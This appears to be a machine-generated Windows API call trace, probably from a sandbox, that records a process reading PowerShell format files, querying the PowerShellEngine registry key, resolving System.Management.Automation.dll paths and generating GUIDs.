	[0841.147] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.150] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.150] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.151] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.151] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0xf37, lpOverlapped=0x0) returned 1
	[0841.151] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a187f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a187f*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0841.152] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0841.152] CloseHandle (hObject=0x2f4) returned 1
	[0841.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0841.152] SetErrorMode (uMode=0x1) returned 0x1
	[0841.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0841.152] SetErrorMode (uMode=0x1) returned 0x1
	[0841.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0841.153] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f4) returned 0x0
	[0841.153] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0841.153] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8310
	[0841.153] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8310, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0841.153] CoTaskMemFree (pv=0x1b9e8310) 
	[0841.153] RegCloseKey (hKey=0x2f4) returned 0x0
	[0841.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0841.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0841.169] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xffe6e05b, Data2=0xf6c2, Data3=0x4795, Data4=([0]=0xbe, [1]=0x78, [2]=0x19, [3]=0xa, [4]=0x92, [5]=0x86, [6]=0xc9, [7]=0x75))) returned 0x0
	[0841.169] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xf6a0875b, Data2=0x8bd5, Data3=0x4997, Data4=([0]=0xbe, [1]=0x3d, [2]=0xf2, [3]=0x66, [4]=0xf4, [5]=0x73, [6]=0x3, [7]=0x7c))) returned 0x0
	[0841.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0841.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0841.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0841.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.380] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x3f9ee98d, Data2=0x1412, Data3=0x4eac, Data4=([0]=0x88, [1]=0x6a, [2]=0xa8, [3]=0xd6, [4]=0x18, [5]=0x68, [6]=0xc4, [7]=0xaf))) returned 0x0
	[0844.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.384] VirtualQuery (in: lpAddress=0x22b640, lpBuffer=0x22c500, dwLength=0x30 | out: lpBuffer=0x22c500*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0844.386] VirtualQuery (in: lpAddress=0x22b6d0, lpBuffer=0x22c590, dwLength=0x30 | out: lpBuffer=0x22c590*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0844.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.387] VirtualQuery (in: lpAddress=0x22be50, lpBuffer=0x22cd10, dwLength=0x30 | out: lpBuffer=0x22cd10*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0844.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.389] VirtualQuery (in: lpAddress=0x22be50, lpBuffer=0x22cd10, dwLength=0x30 | out: lpBuffer=0x22cd10*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0844.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.399] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xdd0f6794, Data2=0x3f80, Data3=0x4f9d, Data4=([0]=0xb8, [1]=0x2e, [2]=0xd2, [3]=0x7d, [4]=0x88, [5]=0x59, [6]=0x6, [7]=0xfc))) returned 0x0
	[0845.517] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xa2882134, Data2=0x455a, Data3=0x45d1, Data4=([0]=0x8d, [1]=0x82, [2]=0x0, [3]=0x9c, [4]=0xe9, [5]=0x7, [6]=0x88, [7]=0xef))) returned 0x0
	[0845.518] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xf4e81f3f, Data2=0xf159, Data3=0x4adc, Data4=([0]=0xb5, [1]=0xb9, [2]=0xcb, [3]=0x38, [4]=0x68, [5]=0xbc, [6]=0xf1, [7]=0x0))) returned 0x0
	[0845.521] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xf91f60f6, Data2=0x1aae, Data3=0x4a1f, Data4=([0]=0xb6, [1]=0x44, [2]=0x8, [3]=0xd5, [4]=0x89, [5]=0xa, [6]=0x23, [7]=0x57))) returned 0x0
	[0845.522] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x124f13f5, Data2=0x1604, Data3=0x4813, Data4=([0]=0x92, [1]=0xd4, [2]=0xa3, [3]=0x2a, [4]=0x40, [5]=0xb4, [6]=0x7, [7]=0x3f))) returned 0x0
	[0845.522] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1ecb5469, Data2=0x36f0, Data3=0x4e6c, Data4=([0]=0x81, [1]=0xa7, [2]=0x52, [3]=0xd2, [4]=0xb5, [5]=0x17, [6]=0x50, [7]=0xc8))) returned 0x0
	[0845.522] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xd7ecbced, Data2=0x2a3e, Data3=0x4a9a, Data4=([0]=0xb8, [1]=0xb6, [2]=0xd3, [3]=0x35, [4]=0x6, [5]=0x7e, [6]=0xe, [7]=0x85))) returned 0x0
	[0845.522] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x6683ad76, Data2=0x2066, Data3=0x4f23, Data4=([0]=0x94, [1]=0x6c, [2]=0x4, [3]=0x1c, [4]=0x0, [5]=0x37, [6]=0xf1, [7]=0x2c))) returned 0x0
	[0845.523] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x21325252, Data2=0x3e9a, Data3=0x4ad5, Data4=([0]=0xac, [1]=0xb8, [2]=0x50, [3]=0x6e, [4]=0xb7, [5]=0x5, [6]=0x69, [7]=0x74))) returned 0x0
	[0845.523] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x82719af3, Data2=0x567e, Data3=0x413a, Data4=([0]=0x9f, [1]=0xa8, [2]=0x26, [3]=0x85, [4]=0xad, [5]=0x9e, [6]=0x39, [7]=0xaa))) returned 0x0
	[0845.525] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x661a31fc, Data2=0x74ef, Data3=0x4beb, Data4=([0]=0x8a, [1]=0xf6, [2]=0xe2, [3]=0xc5, [4]=0xc9, [5]=0x5c, [6]=0x69, [7]=0xb9))) returned 0x0
	[0845.525] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x59025ae3, Data2=0xe158, Data3=0x4925, Data4=([0]=0x88, [1]=0x3, [2]=0x2d, [3]=0xeb, [4]=0x1, [5]=0x2b, [6]=0x12, [7]=0x17))) returned 0x0
	[0845.526] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xdbd331be, Data2=0xb424, Data3=0x4f59, Data4=([0]=0x82, [1]=0xa2, [2]=0x79, [3]=0xec, [4]=0xf9, [5]=0x46, [6]=0xe5, [7]=0x44))) returned 0x0
	[0845.527] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xed3971a8, Data2=0x96c7, Data3=0x4a9d, Data4=([0]=0x80, [1]=0xaa, [2]=0xb, [3]=0xda, [4]=0x21, [5]=0x3b, [6]=0xae, [7]=0xc2))) returned 0x0
	[0845.528] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x4cbfa699, Data2=0x3770, Data3=0x48ff, Data4=([0]=0xb0, [1]=0x4e, [2]=0x42, [3]=0xab, [4]=0xb4, [5]=0xdc, [6]=0xc0, [7]=0x8f))) returned 0x0
	[0845.528] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xeb149bec, Data2=0xe5f7, Data3=0x42c4, Data4=([0]=0x92, [1]=0x90, [2]=0x83, [3]=0xe3, [4]=0xf6, [5]=0xe5, [6]=0x6f, [7]=0xae))) returned 0x0
	[0845.528] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x52ea3b16, Data2=0x4ca1, Data3=0x4ef6, Data4=([0]=0x9c, [1]=0x59, [2]=0xfa, [3]=0x9, [4]=0xc6, [5]=0xc7, [6]=0x10, [7]=0x2e))) returned 0x0
	[0845.529] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xf8bdc7a6, Data2=0x9ea7, Data3=0x4c86, Data4=([0]=0x83, [1]=0x7a, [2]=0xba, [3]=0xd2, [4]=0x5f, [5]=0xc1, [6]=0x87, [7]=0xb0))) returned 0x0
	[0845.532] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1ce20b90, Data2=0x8728, Data3=0x413c, Data4=([0]=0x8b, [1]=0xa4, [2]=0x2a, [3]=0xd3, [4]=0x25, [5]=0xbd, [6]=0x17, [7]=0x84))) returned 0x0
